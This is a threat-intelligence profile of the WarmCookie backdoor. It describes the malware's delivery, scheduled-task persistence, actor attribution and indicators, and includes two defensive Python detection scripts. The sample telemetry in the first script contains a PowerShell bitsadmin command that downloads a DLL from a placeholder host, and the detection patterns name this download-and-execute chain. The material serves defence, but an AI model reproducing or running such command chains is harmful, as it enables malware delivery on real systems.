WarmCookie
WarmCookie, also known as BadSpace, is a Windows backdoor malware family first reported in April 2024. It has been distributed through malspam, malvertising, phishing emails, malicious downloads, and recruiting-, invoice-, and job-themed lures, often as obfuscated JavaScript delivered in ZIP archives that launches PowerShell and Bitsadmin to download and execute a WarmCookie DLL. It has also been observed delivered by other malware distribution ecosystems, including CastleLoader/CASTLEBOT. WarmCookie is designed to provide long-term access to compromised environments and to enable remote access, data theft, and deployment of additional payloads. Reported follow-on payloads include CSharp-Streamer-RAT and Cobalt Strike, and it has also been referenced as a secondary payload in broader loader ecosystems.
WarmCookie establishes persistence via Windows Task Scheduler. Reporting specifically notes use of the legacy Task Scheduler 1.0 COM interfaces for persistence, as well as scheduled tasks created under paths such as %ALLUSERSPROFILE% or %ALLDATA%, with re-execution after a 60-second delay. Newer variants changed the scheduled-task execution parameter from /p to /u and use randomized folder and task names derived from a "string bank" of legitimate company names to improve evasion. Recent variants also introduced dual GUID-like mutexes, campaign IDs embedded since July 2024, and additional execution handlers for EXE, DLL, and PowerShell payloads, including DLL execution via rundll32.exe with a Start export. Elastic reported that payloads are written to temporary directories before execution and that some builds support self-update and persistence removal commands.
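The persistence and execution chain described above (script host to PowerShell to Bitsadmin, a DLL staged under %ALLUSERSPROFILE%, and rundll32.exe invoking a Start export, possibly from a scheduled task) maps onto a few endpoint telemetry checks. The following is an added example written for this profile, not code from the original page or from any of the vendor reports it cites; it runs three heuristics over constructed Sysmon-style process-creation events and scheduled-task registrations. All field names, paths, task names and command lines are assumptions, not real indicators.

```python
"""
Added example for this profile (not code from the original page or from any
vendor report it cites): heuristic checks for the WarmCookie delivery and
persistence chain described above, run over constructed Sysmon-style
process-creation events and scheduled-task registrations. All field names,
paths, task names and command lines below are assumptions, not real IoCs.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


@dataclass
class TaskEvent:
    task_name: str      # newer builds randomize task names, so never key on the name alone
    action: str         # the command line the task executes


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Delivery chain on the page: script host -> PowerShell -> Bitsadmin download.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# rundll32 loading a DLL and invoking its "Start" export; quoted paths may contain spaces.
RUNDLL32_START = re.compile(r'rundll32(?:\.exe)?\s+(?:"[^"]+\.dll"|\S+\.dll)\s*,\s*Start\b', re.I)

# Staging locations named on the page (%ALLUSERSPROFILE% resolves to C:\ProgramData).
STAGING_PATH = re.compile(r"(?:%ALLUSERSPROFILE%|%ALLDATA%|[A-Z]:\\ProgramData)\\", re.I)


def script_host_spawns_bitsadmin_shell(ev):
    """Script host parent launching PowerShell whose command line references bitsadmin."""
    return (_basename(ev.parent_image) in SCRIPT_HOSTS
            and _basename(ev.image) in SHELLS
            and "bitsadmin" in ev.command_line.lower())


def rundll32_start_export(ev):
    """rundll32.exe calling a DLL's Start export, the handler behaviour reported by Elastic."""
    return _basename(ev.image) == "rundll32.exe" and RUNDLL32_START.search(ev.command_line) is not None


def staging_task_with_start_export(task):
    """Scheduled task whose action runs a DLL from ProgramData through rundll32 ...,Start."""
    return STAGING_PATH.search(task.action) is not None and RUNDLL32_START.search(task.action) is not None


def triage(proc_events, task_events):
    """Return (rule_name, evidence) tuples in input order."""
    hits = []
    for ev in proc_events:
        if script_host_spawns_bitsadmin_shell(ev):
            hits.append(("script_host_powershell_bitsadmin", ev.command_line))
        if rundll32_start_export(ev):
            hits.append(("rundll32_start_export", ev.command_line))
    for task in task_events:
        if staging_task_with_start_export(task):
            hits.append(("programdata_task_rundll32_start", task.task_name))
    return hits


# Constructed sample telemetry: two suspicious processes, two benign ones,
# one suspicious task and one benign task. Company name and URL are invented.
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wscript.exe",
              r'powershell.exe -NoProfile -Command "bitsadmin /transfer job http://example.invalid/a C:\ProgramData\Contoso Ltd\Contoso.dll"'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\svchost.exe",
              r'rundll32.exe "C:\ProgramData\Contoso Ltd\Contoso.dll",Start'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),
]
SAMPLE_TASKS = [
    TaskEvent("Contoso Ltd Update", r'rundll32.exe "C:\ProgramData\Contoso Ltd\Contoso.dll",Start'),
    TaskEvent("VendorUpdater", r'"C:\Program Files\Vendor\update.exe" /silent'),
]


def sample_hits():
    return triage(SAMPLE_PROCS, SAMPLE_TASKS)


if __name__ == "__main__":
    for rule, evidence in sample_hits():
        print(f"{rule}: {evidence}")
```

The task check deliberately keys on the action path and the rundll32 Start export rather than on the task name, because the page notes newer variants draw folder and task names from a bank of legitimate company names; a name allowlist would miss those. The script-host-to-PowerShell chain is the noisiest of the three and is best combined with the Bitsadmin reference or with the destination path, as done here.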
Cisco Talos assessed with high confidence that recent WarmCookie/BadSpace post-compromise activity is related to TA866 (also known as Asylum Ambuscade), and Talos further assessed that WarmCookie likely shares authorship with the Resident backdoor based on code and functional similarities including RC4 decryption and mutex handling. Proofpoint also reported TA584 using WarmCookie in 2024, and Recorded Future linked WarmCookie infrastructure and delivery to TAG-150/GrayBravo-associated CastleLoader activity. Victimology associated with TA866-linked follow-on activity was concentrated in the United States, with manufacturing the most affected sector, followed by government and financial services.
Infrastructure and clustering details reported for WarmCookie include campaign IDs such as traffic1, traffic2, lod2lod, capo, and PrivateDLL; RC4 keys including 83ddc084e21a244c, fd1285af2130, and ac180d12b62a; and a likely reused default SSL certificate across C2 infrastructure with SHA1 fingerprint e88727d4f95f0a366c2b3b4a742950a14eff04a4 and SHA256 fingerprint 8c5522c6f2ca22af8db14d404dbf5647a1eba13f2b0f73b0a06d8e304bd89cc0. Reported C2-related indicators include the domain storsvc-win[.]com and the IP 192[.]36[.]57[.]164. WarmCookie was also named among malware families targeted by Europol's Operation Endgame actions in May 2025, but subsequent reporting indicates the malware remained active and continued to evolve.
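The network indicators above are printed in defanged form and the certificate fingerprints in bare hex, while sensors typically log fingerprints colon-separated and upper case. The following is an added example written for this profile (not code from the original page or from any vendor tooling) that refangs the reported domain and IP, normalizes the reported fingerprints, and matches them against constructed Zeek-style dns/ssl/conn records. The record field names and sample values are assumptions; the indicator values are those reported on the page.

```python
"""
Added example for this profile (not code from the original page or from any
vendor tooling): refang the defanged network indicators listed above, normalize
the reported certificate fingerprints, and match both against constructed
Zeek-style dns/ssl/conn records. The record field names and sample values are
assumptions; the indicator values themselves are the ones reported on the page.
"""
import re

# Indicators as reported above (network values in defanged form).
REPORTED = {
    "domain": ["storsvc-win[.]com"],
    "ip": ["192[.]36[.]57[.]164"],
    "cert_sha1": ["e88727d4f95f0a366c2b3b4a742950a14eff04a4"],
    "cert_sha256": ["8c5522c6f2ca22af8db14d404dbf5647a1eba13f2b0f73b0a06d8e304bd89cc0"],
}


def refang(value):
    """Undo common defanging ([.] (.) [dot] (dot) hxxp) and lowercase for comparison."""
    v = value.strip().lower()
    for token in ("[.]", "(.)", "[dot]", "(dot)"):
        v = v.replace(token, ".")
    return re.sub(r"^hxxp", "http", v)


def norm_fingerprint(value):
    """Drop separators and case so 'E8:87:...' and 'e887...' compare equal."""
    return re.sub(r"[^0-9a-f]", "", value.lower())


def build_index():
    return {
        "domain": {refang(d) for d in REPORTED["domain"]},
        "ip": {refang(i) for i in REPORTED["ip"]},
        "cert_sha1": {norm_fingerprint(f) for f in REPORTED["cert_sha1"]},
        "cert_sha256": {norm_fingerprint(f) for f in REPORTED["cert_sha256"]},
    }


def domain_hit(name, domains):
    """Exact match or any subdomain of a reported domain."""
    return any(name == d or name.endswith("." + d) for d in domains)


def match_records(records, index=None):
    """Return (uid, indicator_type, observed_value) for every field that hits the index."""
    index = index or build_index()
    hits = []
    for r in records:
        for field in ("query", "server_name"):
            name = refang(r.get(field, ""))
            if name and domain_hit(name, index["domain"]):
                hits.append((r["uid"], "domain", name))
        ip = refang(r.get("id.resp_h", ""))
        if ip in index["ip"]:
            hits.append((r["uid"], "ip", ip))
        for kind in ("cert_sha1", "cert_sha256"):
            fp = norm_fingerprint(r.get(kind, ""))
            if fp and fp in index[kind]:
                hits.append((r["uid"], kind, fp))
    return hits


# Constructed sample records: a DNS lookup of a subdomain of the reported domain,
# a TLS session whose server certificate carries the reported SHA-1 (logged
# colon-separated and upper case), a connection to the reported IP, and a benign one.
SAMPLE_RECORDS = [
    {"uid": "C1", "query": "www.storsvc-win.com"},
    {"uid": "C2", "server_name": "cdn.example.invalid",
     "cert_sha1": "E8:87:27:D4:F9:5F:0A:36:6C:2B:3B:4A:74:29:50:A1:4E:FF:04:A4"},
    {"uid": "C3", "id.resp_h": "192.36.57.164"},
    {"uid": "C4", "id.resp_h": "203.0.113.10"},
]


def sample_hits():
    return match_records(SAMPLE_RECORDS)


if __name__ == "__main__":
    for uid, kind, value in sample_hits():
        print(f"{uid}: {kind} = {value}")
```

Because the page reports the certificate as a likely reused default across C2 infrastructure, the fingerprint match tends to outlive any single domain or IP and is the better pivot for retrospective hunting. The campaign IDs and RC4 keys listed above are in-sample values and belong in file-level rules rather than in this network index.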
Groups observed using it
4 distinct threat actors attributed by public researchers.
We assess with high confidence that recent post-compromise intrusion activity associated with WarmCookie/BadSpace is related to previous post-compromise activity that we attribute to TA866.
These malware families are frequently observed as initial infection vectors that deliver a wide range of secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT...
"...a new backdoor “BadSpace”..."; "...the malware’s alias name WarmCookie."
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Qakbot was frequently distributed through phishing emails, including hijacked email threads... WarmCookie, also known as BadSpace, is a malware family... being distributed through malspam and malvertising.
Execution
10 techniques
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
We identified four new handlers ... providing quick capabilities to launch executables, DLLs, and scripts: ... PowerShell script execution ... Then, it executes the temporary file directly or uses either rundll32.exe or PowerShell.exe.
Malware and MITRE ATT&CK ... Techniques ... Command and Scripting Interpreter: Windows Command Shell.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Warm Cookie is a backdoor distributed via phishing emails and malicious downloads. It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
Persistence
4 techniques
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
Privilege Escalation
3 techniques
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
Stealth
6 techniques
"campaign markers embedded as RC4 keys" and code references to decrypted strings (e.g., "StringDecrypt" / "StringDecrypt2")
It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
"New variants now embed two separate GUID-like mutexes, which are used for better control over initialization and synchronization"
This is done for defense evasion purposes, allowing the malware to relocate to more legitimate-looking directories.
Discovery
1 technique
Collection
2 techniques
Command and Control
4 techniques
The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...
Captured screenshots are transmitted to the attacker’s C2 server ... via HTTP POST requests.
IOCs tracked for this family
64 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
26 sources tracked across advisories, community write-ups, and news.
Malware family distributed through malspam and malvertising. In the COM-focused example, it initializes COM and uses the legacy Task Scheduler 1.0 COM object via CLSID_CTaskScheduler and IID_ITaskScheduler to create a work item, configure flags, create a trigger, and establish persistence.
Named as a remote access trojan distributed by CastleLoader.
Previously distributed payload in TA584 activity; the source does not describe its specific functionality.
Previously used malware family in TA584 activity (mentioned historically).